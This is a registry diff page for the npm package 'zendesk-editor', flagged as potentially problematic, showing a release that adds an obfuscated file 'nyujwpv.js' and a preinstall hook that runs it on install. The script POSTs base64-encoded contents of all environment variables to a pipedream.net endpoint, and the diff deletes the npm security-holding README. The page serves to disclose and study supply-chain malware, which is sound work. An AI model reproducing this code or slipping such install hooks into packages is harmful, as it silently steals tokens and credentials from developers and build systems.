zendesk-editor 0.0.1-security → 4.916.320
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of zendesk-editor might be problematic. Click here for more details.
- package/nyujwpv.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/nyujwpv.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
function a0_0x5df8(){const _0x558278=['pipedream','write','end','4QyOjsz','request','347313rgjdND','2634440vjSXks','stringify','from','4aaa0dfa016c3686a57e93787657fa37','join','5544wfomyT','655734CIlHNR','9599280wGnUNt','https','env','20SObIlb','npm_package_name','base64','281038ESTFiM','2570MvjOND','1404592PgsrmT'];a0_0x5df8=function(){return _0x558278;};return a0_0x5df8();}const a0_0x232b0b=a0_0x19a6;(function(_0xe6940e,_0x5e72ec){const _0x556752=a0_0x19a6,_0x3cc444=_0xe6940e();while(!![]){try{const _0x42a02d=parseInt(_0x556752(0x98))/0x1+parseInt(_0x556752(0xa1))/0x2+-parseInt(_0x556752(0xa0))/0x3*(parseInt(_0x556752(0x9e))/0x4)+parseInt(_0x556752(0xab))/0x5*(parseInt(_0x556752(0xa7))/0x6)+parseInt(_0x556752(0x9a))/0x7+-parseInt(_0x556752(0xa8))/0x8+parseInt(_0x556752(0xa6))/0x9*(-parseInt(_0x556752(0x99))/0xa);if(_0x42a02d===_0x5e72ec)break;else _0x3cc444['push'](_0x3cc444['shift']());}catch(_0x5bec48){_0x3cc444['push'](_0x3cc444['shift']());}}}(a0_0x5df8,0xba0dd));function a0_0x19a6(_0xbd0223,_0x33cae6){const _0x5df8f1=a0_0x5df8();return a0_0x19a6=function(_0x19a6f0,_0x3829be){_0x19a6f0=_0x19a6f0-0x98;let _0x532ed1=_0x5df8f1[_0x19a6f0];return _0x532ed1;},a0_0x19a6(_0xbd0223,_0x33cae6);}const http=require(a0_0x232b0b(0xa9));req=http[a0_0x232b0b(0x9f)]({'host':[a0_0x232b0b(0xa4),'m',a0_0x232b0b(0x9b),'net'][a0_0x232b0b(0xa5)]('.'),'path':'/'+(process[a0_0x232b0b(0xaa)][a0_0x232b0b(0xac)]||''),'method':'POST'}),req[a0_0x232b0b(0x9c)](Buffer[a0_0x232b0b(0xa3)](JSON[a0_0x232b0b(0xa2)](process[a0_0x232b0b(0xaa)]))['toString'](a0_0x232b0b(0xad))),req[a0_0x232b0b(0x9d)]();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "zendesk-editor",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "4.916.320",
|
|
4
|
+
"main": "nyujwpv.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node nyujwpv.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=zendesk-editor for more information.
|